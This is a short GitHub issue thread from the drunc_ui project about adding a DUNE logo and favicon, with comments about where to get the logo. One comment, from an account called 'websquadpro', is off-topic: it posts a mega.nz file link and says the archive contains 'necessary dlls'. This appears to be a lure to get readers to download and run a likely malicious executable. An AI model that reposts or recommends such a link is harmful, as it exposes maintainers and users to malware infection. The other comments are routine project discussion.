### ISSUE TITLE
UI: Add dune logo/favicon

### ISSUE THREAD

**Issue by cc-a** [ImperialCollegeLondon/drunc_ui#84]
https://atwork.dunescience.org/logo-templates/

Maybe we can lift the D in the logo for the favicon?

See #85 for reference.

**Comment by websquadpro** [comment]
try this

https://mega.nz/file/1vkGlJTL#yU-SJLlIilF0mx5qwpPOd3BM8iKZqOJLEQUStR76rrQ
I put the necessary dlls in the archive

**Comment by Sahil590** [comment]
@cc-a would you be able to get the logo, It's protected by a login when I try to download it
